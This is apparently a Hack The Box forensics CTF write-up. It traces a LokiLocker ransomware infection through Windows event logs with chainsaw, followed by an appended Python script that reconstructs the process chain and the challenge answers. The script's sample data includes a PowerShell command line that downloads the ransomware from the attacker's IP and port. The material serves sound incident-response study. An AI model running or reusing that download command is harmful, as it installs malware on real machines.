HTB Writeups

Hack the Boo 2023
Valhalloween

Personal Rating: Easy

Last updated 1 year ago

We have a lot of Windows Event Log files in evtx format.

I ran chainsaw over them with this command, which is perfect for this job:

./chainsaw hunt /HTBfolder/HacktheBoo2023/forensics_valhalloween/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/

The challenge was in a question-answer style. Here are the results that I could deduce from the chainsaw output:

1)

  • The first challenge question is “What are the IP address and port of the server from which the malicious actors downloaded the ransomware?"

  • I searched for “Download” in the chainsaw log to find instances of software being downloaded to the PC. I quickly identified 103.162.14.116:8888 as the source.

2)

  • The second question is to find the MD5 hash of the WannaCry malware that was executed. The timestamp at which the malware was initially downloaded was 2023-09-20 03:03:22. Here I see that the program is called "mscalc.exe". Searching for that in the logs, I found the initial execution of the program at 2023-09-20 03:03:24 with the MD5 hash B94F3FF666D9781CB69088658CD53772.

3)

  • The third question is to find the family label of the ransomware online, based on the hash.

  • Searching for the hash on VirusTotal, the family name seems to be “lokilocker”.

4)

  • The fourth question is to find the name of the task scheduled by the ransomware.

  • Searching for “Scheduled Task Creation” in the chainsaw output, I quickly found the name "Loki" for a task created by the malware.

5)

  • The fifth question is to find the process name and ID of the ransomware process in the format svchost.exe_4953. To find it, I went back to the timestamp of the initial execution, 2023-09-20 03:03:24.

  • What they wanted here was the name and process ID of the parent process, which is PowerShell. The solution was powershell.exe_3856.

6)

  • In the sixth question we should follow the PPID we just found to provide the file path that initiates the infection chain, for example C:\malicious.pdf.

  • C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe seems to be wrong. We might have to look earlier.

  • I followed the execution flow upward from the process ID by searching for each ParentProcessID until I found the initial one, which is 7280. The ParentCommandline of that process with the ID 7280 is the following, which contains the initial malicious document:

"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o

7)

  • The next question is to find the timestamp of when the first file in the execution chain was opened.

  • I noticed that I should also produce the same chainsaw output in JSON format, so that I could search for full strings. I did that with:

./chainsaw hunt /HTBfolder/HacktheBoo2023/forensics_valhalloween/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ --json | jq > out.txt

  • I found the event in the chainsaw output, but its timestamp was two seconds off, so the result was not accepted. The correct time could be found by checking the Security event log in Windows Event Viewer and searching for event ID 4688, which is the file open event. Looking for the time when the docx file from before was opened, we found the event at 2023-09-20_03:03:20.
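The steps above (finding the download source and the hash of the first execution in questions 1 and 2, then walking ParentProcessID links up to the document that started the chain in questions 5 to 7) are mechanical enough to script. The block below is an added example and not part of the original write-up or of chainsaw: it works on process-creation records already extracted from EVTX into Python dicts, using Sysmon Event ID 1 field names (Security 4688 carries the same process, parent and command-line data under other field names and without hashes). PIDs 7280 and 3856, the WINWORD command line, the IP:port and the mscalc.exe MD5 mirror the write-up; the explorer.exe record, the PowerShell command line, the ransomware's PID 5120 and the placeholder hashes are constructed for the sample.

```python
import os
import re

# Constructed sample records in Sysmon Event ID 1 shape. Values that appear in
# the write-up are kept; explorer.exe, the PowerShell command line, PID 5120 and
# the A/B/C hash strings are made-up placeholders.
EVENTS = [
    {"UtcTime": "2023-09-20 03:01:05", "ProcessId": 4100, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE",
     "Hashes": "MD5=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},
    {"UtcTime": "2023-09-20 03:03:20", "ProcessId": 7280, "ParentProcessId": 4100,
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n '
                    r'"C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o',
     "Hashes": "MD5=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"},
    {"UtcTime": "2023-09-20 03:03:22", "ProcessId": 3856, "ParentProcessId": 7280,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Invoke-WebRequest -Uri http://103.162.14.116:8888/mscalc.exe "
                    r"-OutFile C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe",
     "Hashes": "MD5=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"},
    {"UtcTime": "2023-09-20 03:03:24", "ProcessId": 5120, "ParentProcessId": 3856,
     "Image": r"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe",
     "CommandLine": r"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe",
     "Hashes": "MD5=B94F3FF666D9781CB69088658CD53772,SHA256=<placeholder>"},
]

# host[:port] of any URL in a command line
URL_RE = re.compile(r"https?://([\w.-]+(?::\d+)?)", re.I)
# a Windows path ending in a user-document extension (stops at a closing quote)
DOC_RE = re.compile(r'([A-Za-z]:\\[^"]+?\.(?:docx?|xlsx?|pptx?|pdf|rtf))\b', re.I)


def parse_hashes(field):
    """Turn Sysmon's 'MD5=...,SHA256=...' string into a dict keyed by algorithm."""
    return dict(part.split("=", 1) for part in field.split(",") if "=" in part)


def image_name(event):
    """Lower-cased file name of the Image field (backslashes normalised first)."""
    return os.path.basename(event["Image"].replace("\\", "/")).lower()


def proc_label(event):
    """Challenge answer format: <image name>_<pid>, e.g. powershell.exe_3856."""
    return f"{image_name(event)}_{event['ProcessId']}"


def find_download_source(events):
    """First host:port referenced by a URL in any command line, in time order."""
    for e in sorted(events, key=lambda e: e["UtcTime"]):
        m = URL_RE.search(e["CommandLine"])
        if m:
            return m.group(1)
    return None


def md5_of_first_execution(events, name):
    """MD5 recorded on the earliest process-creation event of the given image."""
    for e in sorted(events, key=lambda e: e["UtcTime"]):
        if image_name(e) == name.lower():
            return parse_hashes(e["Hashes"]).get("MD5")
    return None


def ancestors(events, pid):
    """Follow ParentProcessId links from pid upward; returns the chain child-first.
    Stops when a parent has no recorded creation event. PID reuse is not handled,
    so on a real host restrict the records to the incident's time window."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid and by_pid[pid] not in chain:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def find_infection_origin(events, pid):
    """Outermost ancestor whose command line names a user document, with that path.
    Walking all the way up (rather than stopping at the first hit) is what skips
    the dropped mscalc.exe and lands on the Word document."""
    origin = None
    for e in ancestors(events, pid):
        m = DOC_RE.search(e["CommandLine"])
        if m:
            origin = (e, m.group(1))
    return origin


def answers(events, ransomware_pid):
    """Collect the write-up's answers for questions 1, 2, 5, 6 and 7."""
    chain = ancestors(events, ransomware_pid)
    parent = chain[1] if len(chain) > 1 else None
    origin = find_infection_origin(events, ransomware_pid)
    return {
        "download_source": find_download_source(events),
        "ransomware_md5": md5_of_first_execution(events, "mscalc.exe"),
        "parent_process": proc_label(parent) if parent else None,
        "origin_document": origin[1] if origin else None,
        # challenge wants YYYY-MM-DD_HH:MM:SS
        "origin_time": origin[0]["UtcTime"].replace(" ", "_") if origin else None,
    }


if __name__ == "__main__":
    for key, value in answers(EVENTS, 5120).items():
        print(f"{key}: {value}")
```

The same functions apply to chainsaw's JSON output once each detection's EventData has been flattened into a dict with these field names; the only part that is challenge-specific is the answer formatting in answers().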